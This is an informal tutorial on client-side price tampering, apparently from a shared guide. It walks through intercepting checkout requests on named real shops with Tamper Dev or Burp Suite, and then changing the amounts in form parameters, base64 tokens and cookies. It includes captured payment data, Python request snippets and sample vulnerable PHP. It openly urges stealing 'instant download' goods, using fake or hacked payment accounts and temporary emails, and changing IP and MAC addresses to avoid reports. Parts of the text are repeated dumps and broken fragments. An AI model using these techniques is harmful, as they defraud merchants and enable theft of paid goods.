-

IF YOU DECIDED TO LEARN

PRICE CHANGING +
APPLICATE IT
THEN YOU MUST BE FULL
READY FOR INSULTING +
REFUNDS + FAST LEAKING
HAHAHA
PREPARE CHROME-FIREFOX + TAMPER DEV

including some targets and lets start

inspecting the web.... ;)

HTML IS WEB MARKUP LANGUAGE FOR

SHOWING ELEMENTS + FORMS OF A

WEBSITE PAGE...
1-"price":"2.79","priceValidUntil":"2
023-06-
19","priceSpecification":{"price":"2.
79",
2-
<script type="text/javascript">
$('#button-cart').on('click',
function () { var product_id =
"amNraG6ZcGlhbmhj" var
quantity =
$("input[name='quantity']").val()
var name = "1 Billion Worldwide Email
Lists database active VIP High
quality package B2B,B2C" var
image
="/static/7935/60ee87fb6854b6d1fc9743
1f.png"; var price = "$2.79"
price = price.replace('$', '')
3-
<p class="price">$2.79</p>
var price = "$2.79" price =
price.replace('$', '')
s
https://www.99datacd.com/pay.php#pay

This is our SECOND PRICE CHANGING EXAMPLE

We will target this package :

https://www.99datacd.com/product/indian-business-
directory.html#Top-100-Business-Data
Wich is very expensive

As ethical leakers + tamper boys we dont care about the

price... all we care is the instant delivery of the digital
shit... ;)
And its clearly says on logo of
the website ( INSTANT
DOWNLOAD )LOL XD

Its ur choice but for better results

( try changing prices at the start
everytime and if failed go for middle or
end.... )

The reason changing price earlier is useful

( because of price and amounts checkers +
verifiers... )

But keep trying + learning

Lets continue

Now input any random data for phone + name:

----Afterwards you will be redirect to more informations

form : ( address , name , country , email , phone )
Warning : delivery email must be always valid or you can
use TEMPORARY MAILS like tempail.com
https://temp-mail.org/en/
https://tempail.com/en/ ( personally used by me a lot!! )
https://tempmailo.com/

when ready lets fire up TAMPER DEV OR BURPSUITE :

In my case using TAMPER DEV

Lets make intercept (ON) then click PROCEED BUTTON !!

This is the output ( you amazing price changers ):

courier=downloadonly&account_id=11028&return_url=
https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2F99datacd.com%2Fresponse.php%3FDR
%3D%7BDR%7D&mode=LIVE&reference_no=4757&amo
unt=85000&currency=INR&description=%23cd_307%23
&prd_list=Super+Discounted+Top+100+Trades+Data+Co
mbo&name=je+leak+you&address=hahahah&city=haha
hah&state=hahahah&postal_code=395983&country=AT
A&email=hirtegepse%40vusra.com&phone=067649092
4&submitted=Proceedcourier=downloadonly&account_i
d=11028&return_url=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2F99datacd.com%2
Fresponse.php%3FDR%3D%7BDR%7D&mode=LIVE&refe
rence_no=4757&amount=85000&currency=INR&descrip
tion=%23cd_307%23&prd_list=Super+Discounted+Top+
100+Trades+Data+Combo&name=je+leak+you&address
=hahahah&city=hahahah&state=hahahah&postal_code
=395983&country=ATA&email=hirtegepse%40vusra.co
m&phone=0676490924&submitted=Proceedcourier=do
wnloadonly&account_id=11028&return_url=http%3A%2
F%2F99datacd.com%2Fresponse.php%3FDR%3D%7BDR
%7D&mode=LIVE&reference_no=4757&amount=85000
&currency=INR&description=%23cd_307%23&prd_list=S
uper+Discounted+Top+100+Trades+Data+Combo&nam
e=je+leak+you&address=hahahah&city=hahahah&state
=hahahah&postal_code=395983&country=ATA&email=
hirtegepse%40vusra.com&phone=0676490924&submitt
ed=Proceedcourier=downloadonly&account_id=11028&
return_url=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2F99datacd.com%2Fresponse.
php%3FDR%3D%7BDR%7D&mode=LIVE&reference_no=
4757&amount=85000&currency=INR&description=%23c
d_307%23&prd_list=Super+Discounted+Top+100+Trade
s+Data+Combo&name=je+leak+you&address=hahahah
&city=hahahah&state=hahahah&postal_code=395983&
country=ATA&email=hirtegepse%40vusra.com&phone=
0676490924&submitted=Proceedcourier=downloadonly
&account_id=11028&return_url=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2F99dat
acd.com%2Fresponse.php%3FDR%3D%7BDR%7D&mod
e=LIVE&reference_no=4757&amount=85000&currency=
INR&description=%23cd_307%23&prd_list=Super+Disco
unted+Top+100+Trades+Data+Combo&name=je+leak+y
ou&address=hahahah&city=hahahah&state=hahahah&p
ostal_code=395983&country=ATA&email=hirtegepse%4
0vusra.com&phone=0676490924&submitted=Proceed

All we care about is the price amounts wich you can see
by red color...

1 United States Dollar equals

77.94 Indian Rupee

By exchanging 1 dollar to INR = 77 OR 78 INR

So we will change 85 000 to 80

Bonus trick : ( you can curl converter python
with COPY AS CURL to change the price )
Lets do it!

3 things we need :
1-F12 FIREFOX OR CHROME
2-Copy as curl function + stopping the request
before response appears...

Paste the curl output here :

While picking python as converting target:

https://curlconverter.com/
Afterwards press CTRL F + SEARCH AMOUNT=
or exactly the price of purchase if found :
congrats u will change the price with python if
not you will have to find another bug FOR THE
PROCESS..
Url = response.url #the redirected url after
payment started..
Taxtrsp = response.text#the response page
after payment started..

Print(url) #the redirected url after payment

started..
Print(taxtrsp)#the response page after
payment started..

Tips + bonus : you can add

allow_redirects=True to the
requests.post on each response , final
line
response =
requests.post('https://www.99datacd.com/se
cure.php', cookies=cookies, headers=headers,
data=data)
response =
requests.post('https://www.99datacd.com/se
cure.php', cookies=cookies, headers=headers,
data=data , allow_redirects=True)
Bonus tips : while sending requests or responses edited on TAMPER DEV MAKE SURE THE REQUEST
FULLY FORWARDED ( after that can click CANCEL blue button on top or disable interception radio
button... EASY PEASY

And boom as you see the price of razor pay payment is 100 INR SAME AS CHOSEN...

Can we go further ?? yes just use fake payment accounts ( no real owner account of ur own ) then
steal the digital download ( instant downloads option only... )

Thats enough for our first part of price changing trough html-js manipulation...
.

So as you know some shops or

websites use JS-php-css files ( same
site or outside the same origin )
We dont care if outside or inside

All we care about is the vulnerabity

or if they contains price amounts..
Afterwards we will test on this
websites for this purpose :
https://bulkdata.io/fr/product/fr-
charity-companies
This is the exact process:
1-navigate to the page
2-Open inspect network tab using F12
3-Refresh the page until all requests loaded + page fully
loaded..
4-Press CTRL + F then search the exact amount with or
without dots..

Lets inspect further

Just double click on the highlited prices by yellow!

You will be forwarded to the exact request containing
price... ( easy enough right? LOL XD)
After seeing the price inside html tags wich are : <td> <tr> <a> <div> ........... ETC
10000% means not able to tamper or change ( must be inside a function js or post or get parameter..!

"priceCurrency": "EUR", "price": 29, "availability":

"https://schema.org/OnlineOnly", "priceValidUntil": "2022-
05-24

This part exist on the source code HTML wich is useless ( if

you discover any price amount including «priceValidUnitl»
it means just move on man ahahhaa

Or you can use TAMPER DEV instead like :

The page use new tab for proceeding payment then solution
is simple : remove using inspect element :
Target=»blank» is the code used for new tab payment :

Remove it from html then press payment button NOW !

Easy enough lol payment intercepted successfuly!! NO

NEED TO FOLLOW THE NEW TABS EVERYTIME!

We can celebrate now woooohoooo

Oh wait ! we cant celebrate until price
changed haha

Lets move to the final targets...

Lets try another targets:

Preserve log must be already activated

Then scroll the page and add cart until payment page started so
you can search all requests passed until the payment page...
So first of all you must find base64 price amount
encrypted example 500.00 USD then go to base64encode
website and encode the price with same format then
replace on the tamper point ;) easy pezy
https://www.base64encode.net/

t's basically a way of encoding arbitrary binary data in

ASCII text. It takes 4 characters per 3 bytes of data, plus
potentially a bit of padding at the end.
Essentially each 6 bits of the input is encoded in a 64-
character alphabet. The "standard" alphabet uses A-Z, a-z,
0-9 and + and /, with = as a padding character. There are
URL-safe variants
If return url does not exist means its not
instant delivery OR its email delivery on server
side...
One test:
https://www.nonprofitlists.com/buy-
database.html
Go to buy paypal button click it then use the
api url token ...

Output =
https://www.mediafire.com/download/yhq8f
k4tz3p3vk9
unt_from_api":299}}],"postBackData":{},"shipping_address_list":[null],
"shipping_phone_number_list":[null],"phone_fields":{}},"state":"creat
ed","supplementary":{"buyer_set_in_session":false},"payer":{},"partne
rIntegration":false,"cartHasInventory":false,"instantUpdateIntegratio
n":false,"grossTotalAmount":{"value":"299.00","currency":"USD"},"payp
alForPartner":false,"partnerDetail":{"businessName":"STSAdmin","clien
tId":"Ac-33pHd-kCzSZnWI-2j--
FZXoTkB5pce3oke0yiwUOIpdaiasVzyiKS3ZfBla9efL3oetCALipmEsOY","accountN
umber":"1822067133961137468"},"redirectUrls":{"return_url":"https://w
ww.mediafire.com/download/yhq8fk4tz3p3vk9","cancel_url":"https://www.
nonprofitlists.com/buy-
database.html"},"purchaseUnits":[{"amount":{"total":"299.00","currenc
y":"USD","details":{"subtotal":"299.00"}},"payee":{"merchant_id":"PRE
Q8VTXZEYTY","encrypted_email":"ecMGppqlEGhReFpx1rR71BXafVRx7VPpHSRPlw
wlN-
ZAtwa3pzSaprJXxeNP_MHRzlDoMgGTTcpgvK8y"},"item_list":{"items":[{"name
":"NONPROFIT
Playground for you :
https://www.nonprofitlists.com/buy-
database.html
https://www.emailingleads.com/buy-indian-
email-lists/

https://jwt.io/ ( small tool to decode jwt

encoded tokens for inspection + modify
values ) very useful if you like decrypting
codes...
So afterwards :
The best application for this concept is check the
local storage values on certain website while doing
all actions
My own technique for burpsuite to firefox is :
https://addons.mozilla.org/en-
US/firefox/addon/foxyproxy-standard/
Then use 127.0.0.1 along with port used on
burpsuite >> proxy >> options then navigate
http://burp

The only encoding that can be used for digits prices are : BASE64 - MD5 - TOKENS .....

For md5 decode : https://hashes.com/en/decrypt/hash

For base64 decode : https://www.base64decode.org/

Tokens ? depends on the mechanism of encoding used... ( impossible to know without testing.. )

Lets start with base64 :

Lets pretend this is my add cart php code :

Addcart.php >>
<?php
$price = ‘100’;
$token = base64_encode($id); #this function used
to encode string to base64
Header(‘https://mywebsite.com/payment.php?id=
1&prod=’ . $token );
?>

Payment.php >>
<?php
$id_product = $_GET[‘id’];
$base64 = $_GET[‘prod’];
$real_price = base64_decode($base64);
Echo ‘real price is : ‘ . $real_price . ‘dollarz’;
?>

&prod=’ .$token );
?>

The reason of this two scripts :

One is taking the job of encoding the price and
the other is taking the opposite job ( decoding
the amount and using it on the payment )
2-
I can honestly its best creation extension from the best : C GARNIER!!

How to exploit this bug : simply find the price encoded or decoded
value then replace it with same format on the cookie value ( click save )
then REFRESH and play with payment actions on the website targets...
fair enough right?.
He did use set cookie with price of product
and access it trough payment for set amount of
purchase!
For instance :
<?Php
$name = ‘price_cookie’
$value = ‘1000’ # wich means 10 $ or 1 $ in
prices web world
setcookie($name, $value, $expires, $path,
$domain, $secure, $httponly);
?>
<?Php
#here comes the exploit ( you can use cookie
editor extensions to change the amount and
proceed with new price wich can be 1 cent or 1
$ )

$amount = $_COOKIE['price_cookie'];
$use_price = $amount;
?>
Germany email marketing database 1 Million

Germany email marketing database 1 Million

Germany 1 Million Emails List

MS excel files in .zip folder

Fields: company name, email address, city, zip and phone number and consumers
email only

Instant download
 Stripe API error occurred: As per Indian
regulations, only registered Indian businesses (i.e. sole
proprietorships, limited liability partnerships and companies,
but not individuals) can accept international payments.
More info here: https://stripe.com/docs/india-exports

The idea of python price changing is taking vulnerable

requests by right click > copy > copy as C_Url (BASH)
Afterwards paste the copied curl code here:
https://curlconverter.com/
Make sure python is checked : python to curl..
Finally paste the code into new python IDLE or
notepad

Pretty easy and can be used for many purposes

other then price tampering...

Now time for :

2-clear all sent requests is useful only when you deal with large amount of requests or big companies
websites... ( loads many resources... )

4-intercet ON or OFF
Some intercepting price techniques or scenarios will require you to swtitch between ON AND OFF!
GET READY FOR THAT!!

If you have any questions contact me at

gmail : [email protected]

------------------------------------------------------

Final part of book :

1-Dont always use 1 $ price for leaking
something u dont guarrante leaking.. its time
+ money waste... ( 1cent - 0.01 $ is enough
sometimes.. you will lose more than you will
earn LOL )
2-Remember to pay for fake mails or
temporary mails ( they are better than use
real emails under your ip address... just to
prevent the risks of reports! )
3-Changing mac address + ip address is useful
but only if faker or hacked payment accounts
is used , there is no risk or damage at using
virtual machine or real ip....